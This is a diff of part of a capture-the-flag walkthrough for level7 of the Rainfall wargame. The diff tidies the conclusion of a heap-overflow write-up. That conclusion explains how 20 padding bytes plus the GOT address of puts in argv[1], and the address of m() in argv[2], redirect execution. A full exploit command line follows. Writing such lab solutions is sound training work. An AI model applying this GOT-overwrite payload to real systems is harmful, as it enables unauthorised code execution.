gvannest/rainfall/level7/walkthrough.md

     - Payload and output:

+    Conclusion :
-    Conclusion : argv[1] will contain 20 random characters to arrive at the memory locaiton of the 2nd pointer.
+    - argv[1] will contain 20 random characters to arrive at the memory location of the 2nd pointer.
-    Then there is the memory address of the puts funciton in GOT table. argv[2] will contain the address of our m() function
+    - Then there is the memory address of the puts funciton in GOT table.
+    - argv[2] will contain the address of our m() function

     ```
     level7@RainFall:~$ ./level7 $(python -c 'print("A"*20 + "\x28\x99\x04\x08")') $(python -c 'print("\xf4\x84\x04\x08")')